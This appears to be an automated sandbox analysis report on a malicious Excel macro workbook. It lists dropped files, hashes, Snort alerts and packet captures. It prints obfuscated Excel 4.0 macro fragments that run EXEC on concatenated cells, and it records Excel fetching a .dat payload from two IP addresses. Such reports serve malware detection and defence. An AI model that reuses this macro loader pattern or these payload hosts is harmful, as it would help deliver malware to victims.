                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:oyBVomxWtnM0TzkVbl+nM0TzkVblmxWtnM0TzkVblv:dje9TzkVbcTzkVbz9TzkVb1
                                                                                                                                                MD5:5689775EF36F265CCF27A9BAF089052B
                                                                                                                                                SHA1:81F675CAA034CB470D0815A91D6AD59E25EF83E8
                                                                                                                                                SHA-256:FE8FD49E33FDBC456FA7C1D19603A9652BFF3839E92EB7C096428A87628A1562
                                                                                                                                                SHA-512:AB28A99DB258F5D90A6D07F62BF7B0CD6EEDE323084ECA7830DCB2D9B929F6418490E302DD8A0240026766FDFB119FC07BD816872F0912BB7C6BE4E1B42FC67A
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: Desktop.LNK=0..[misc]..Comission_1980420924_03172021.LNK=0..Comission_1980420924_03172021.LNK=0..[misc]..Comission_1980420924_03172021.LNK=0..
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):22
                                                                                                                                                Entropy (8bit):2.9808259362290785
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                C:\Users\user\Desktop\E4B10000
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):188588
                                                                                                                                                Entropy (8bit):7.659329665847556
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:oXFYiB3kNT+2Jozo1UW8gOvlAsku0Gy3ZsY0OPlaK/LBk:oXFYiB3kNBozoR8gOvljFy3ZIOXS
                                                                                                                                                MD5:0594BBF137BDC4A912F57B1F2249C2D1
                                                                                                                                                SHA1:8B8AD9893175DEE2809145FEFB5D615BAA598EEB
                                                                                                                                                SHA-256:4929A9CF58039F4FFDB8A4BD9EB37286B57BC69419F7CF72A92801DB762574D4
                                                                                                                                                SHA-512:ACA23319614EADF4FD9E058566B0FEA3759773650699DCDA62E87BAE5323F8A9AC3E14E6F0EEE5ED0479D8B5C3CC6A03247234D89FBD8F5E614FA5B7FE246016
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: .U.N.1.}G.?..Z.:.TU(..Z.X.....]7..c ..... .I..eo.s.c{f|...z.....7#V..^i.....;.0.....Z..d./g.e..(.a......({.....Qd...^c..s......q.]...1.d..f...fA.WJ.....L.2...R$...."..l.%(/.-A7."..=@...Q.c....0d|'.......Yt...`p....e.b.....].....X....F....1.......}.O..7.A...kXH0M.BF......v/..0.L..v~...m...s%.....{..M..Ci..X|4M....\O7........~..@.1."..OtR.O........s..........{..........?....]..i.D.N..Bsv...b.i..Z......B.S...n^...........PK..........!..#|.....X.......[Content_Types].xml ...(..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\Desktop\~$Comission_1980420924_03172021.xlsm
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):330
                                                                                                                                                Entropy (8bit):1.6081032063576088
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                Malicious:true
                                                                                                                                                Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:Microsoft Excel 2007+
                                                                                                                                                Entropy (8bit):7.660562640081434
                                                                                                                                                TrID:
                                                                                                                                                • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                File name:Comission_1980420924_03172021.xlsm
                                                                                                                                                File size:189036
                                                                                                                                                MD5:7c87c28b3c650992cca31f7728aa2cfd
                                                                                                                                                SHA1:e278ae31532f3f65297d8c97d21080321cd79e9f
                                                                                                                                                SHA256:c794d4aa56fd9e070e2a7ef2b18c08016da687eddb100350216cada8110074d9
                                                                                                                                                SHA512:4844ddff58adea9aeaed98893af851f849e9318c06cf440a0651b043ecfa00499dc3e08812efcf5fad955206d12f0f4e57ad953ecad728fbe0cf57bb1b4d88d7
                                                                                                                                                SSDEEP:3072:kXFYiB3kNT+2Jozo1UW8gOvlAsku0Gy3ZsY0OPlaK/LBt:kXFYiB3kNBozoR8gOvljFy3ZIOXr
                                                                                                                                                File Content Preview:PK..........!..#|.....X.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:74ecd0e2f696908c

                                                                                                                                                Static OLE Info

                                                                                                                                                General

                                                                                                                                                Document Type:OpenXML
                                                                                                                                                Number of OLE Files:1

                                                                                                                                                OLE File "Comission_1980420924_03172021.xlsm"

                                                                                                                                                Indicators

                                                                                                                                                Has Summary Info:
                                                                                                                                                Application Name:
                                                                                                                                                Encrypted Document:
                                                                                                                                                Contains Word Document Stream:
                                                                                                                                                Contains Workbook/Book Stream:
                                                                                                                                                Contains PowerPoint Document Stream:
                                                                                                                                                Contains Visio Document Stream:
                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                Flash Objects Count:
                                                                                                                                                Contains VBA Macros:

                                                                                                                                                Macro 4.0 Code

                                                                                                                                                ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,http://,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                =COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)=EXEC(sheet1!AP264&sheet1!AP263&sheet1!AP265)=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)"=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)=EXEC(sheet1!AP264&sheet1!AP263&""1""&sheet1!AP265)=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)""=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)=EXEC(sheet1!AP264&sheet1!AP263&""2""&sheet1!AP265)=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)"=GOTO(sheet1!AU279)

                                                                                                                                                Network Behavior

                                                                                                                                                Snort IDS Alerts

                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                04/07/21-17:28:31.289345TCP1201ATTACK-RESPONSES 403 Forbidden8049169188.119.112.114192.168.2.22
                                                                                                                                                04/07/21-17:28:31.544942TCP1201ATTACK-RESPONSES 403 Forbidden8049170185.82.219.75192.168.2.22

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Apr 7, 2021 17:35:15.592169046 CEST4970580192.168.2.5188.127.230.104
                                                                                                                                                Apr 7, 2021 17:35:18.648963928 CEST4970580192.168.2.5188.127.230.104
                                                                                                                                                Apr 7, 2021 17:35:24.649446964 CEST4970580192.168.2.5188.127.230.104
                                                                                                                                                Apr 7, 2021 17:35:36.674173117 CEST4971880192.168.2.5188.119.112.114
                                                                                                                                                Apr 7, 2021 17:35:36.702965021 CEST8049718188.119.112.114192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:36.703063011 CEST4971880192.168.2.5188.119.112.114
                                                                                                                                                Apr 7, 2021 17:35:36.704644918 CEST4971880192.168.2.5188.119.112.114
                                                                                                                                                Apr 7, 2021 17:35:36.731509924 CEST8049718188.119.112.114192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:36.932835102 CEST8049718188.119.112.114192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:36.932996035 CEST4971880192.168.2.5188.119.112.114
                                                                                                                                                Apr 7, 2021 17:35:36.940798044 CEST4971980192.168.2.5185.82.219.75
                                                                                                                                                Apr 7, 2021 17:35:36.985958099 CEST8049719185.82.219.75192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:36.986102104 CEST4971980192.168.2.5185.82.219.75
                                                                                                                                                Apr 7, 2021 17:35:36.986771107 CEST4971980192.168.2.5185.82.219.75
                                                                                                                                                Apr 7, 2021 17:35:37.030154943 CEST8049719185.82.219.75192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:37.204653025 CEST8049719185.82.219.75192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:37.204737902 CEST4971980192.168.2.5185.82.219.75
                                                                                                                                                Apr 7, 2021 17:36:41.937640905 CEST8049718188.119.112.114192.168.2.5
                                                                                                                                                Apr 7, 2021 17:36:41.937735081 CEST4971880192.168.2.5188.119.112.114
                                                                                                                                                Apr 7, 2021 17:36:42.209404945 CEST8049719185.82.219.75192.168.2.5
                                                                                                                                                Apr 7, 2021 17:36:42.209533930 CEST4971980192.168.2.5185.82.219.75
                                                                                                                                                Apr 7, 2021 17:37:01.482237101 CEST4971980192.168.2.5185.82.219.75
                                                                                                                                                Apr 7, 2021 17:37:01.482916117 CEST4971880192.168.2.5188.119.112.114
                                                                                                                                                Apr 7, 2021 17:37:01.511718988 CEST8049718188.119.112.114192.168.2.5
                                                                                                                                                Apr 7, 2021 17:37:01.528115034 CEST8049719185.82.219.75192.168.2.5

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Apr 7, 2021 17:34:58.351875067 CEST6530753192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:34:58.364454985 CEST53653078.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:34:58.870826006 CEST6434453192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:34:58.884255886 CEST53643448.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:34:59.193109989 CEST6206053192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:34:59.205982924 CEST53620608.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:34:59.796698093 CEST6180553192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:34:59.810400009 CEST53618058.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:01.967953920 CEST5479553192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:35:01.982530117 CEST53547958.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:02.995198011 CEST4955753192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:35:03.008181095 CEST53495578.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:05.887080908 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:35:05.907430887 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:11.519834042 CEST6544753192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:35:11.577848911 CEST53654478.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:11.996236086 CEST5244153192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:35:12.017131090 CEST53524418.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:12.998294115 CEST5244153192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:35:13.011636019 CEST53524418.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:14.058377028 CEST5244153192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:35:14.078953028 CEST53524418.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:16.070971012 CEST5244153192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:35:16.084076881 CEST53524418.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:20.086781979 CEST5244153192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:35:20.097259998 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:35:20.100059032 CEST53524418.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:20.109745979 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:21.324604988 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:35:21.338169098 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:23.861440897 CEST6529653192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:35:23.874171019 CEST53652968.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:25.492499113 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:35:25.505495071 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:27.621049881 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:35:27.641642094 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:31.248034000 CEST5696953192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:35:31.262487888 CEST53569698.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:33.420664072 CEST5516153192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:35:33.434581041 CEST53551618.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:34.953347921 CEST5475753192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:35:34.966614962 CEST53547578.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:41.939289093 CEST4999253192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:35:41.953826904 CEST53499928.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:44.977627993 CEST6007553192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:35:44.997548103 CEST53600758.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:54.416148901 CEST5501653192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:35:54.443725109 CEST53550168.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:35:57.611288071 CEST6434553192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:35:57.623776913 CEST53643458.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:36:00.173840046 CEST5712853192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:36:00.187432051 CEST53571288.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:36:19.070545912 CEST5479153192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:36:19.097323895 CEST53547918.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:36:39.680593014 CEST5046353192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:36:39.696135044 CEST53504638.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:36:42.336549997 CEST5039453192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:36:42.364864111 CEST53503948.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:37:40.883125067 CEST5853053192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:37:40.946337938 CEST53585308.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:37:41.412671089 CEST5381353192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:37:41.487431049 CEST53538138.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:37:41.748771906 CEST6373253192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:37:41.870615005 CEST53637328.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:37:42.142398119 CEST5734453192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:37:42.224147081 CEST53573448.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:37:42.595407009 CEST5445053192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:37:42.608704090 CEST53544508.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:37:42.965485096 CEST5926153192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:37:42.978367090 CEST53592618.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:37:43.287322044 CEST5715153192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:37:43.300596952 CEST53571518.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:37:43.696594954 CEST5941353192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:37:43.710262060 CEST53594138.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:37:44.463150024 CEST6051653192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:37:44.476830959 CEST53605168.8.8.8192.168.2.5
                                                                                                                                                Apr 7, 2021 17:37:44.744183064 CEST5164953192.168.2.58.8.8.8
                                                                                                                                                Apr 7, 2021 17:37:44.757565022 CEST53516498.8.8.8192.168.2.5

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • 188.119.112.114
                                                                                                                                                • 185.82.219.75

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                0192.168.2.549718188.119.112.11480C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Apr 7, 2021 17:35:36.704644918 CEST1363OUTGET /44293.7328152778.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 188.119.112.114
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Apr 7, 2021 17:35:36.932835102 CEST1363INHTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Wed, 07 Apr 2021 15:35:36 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
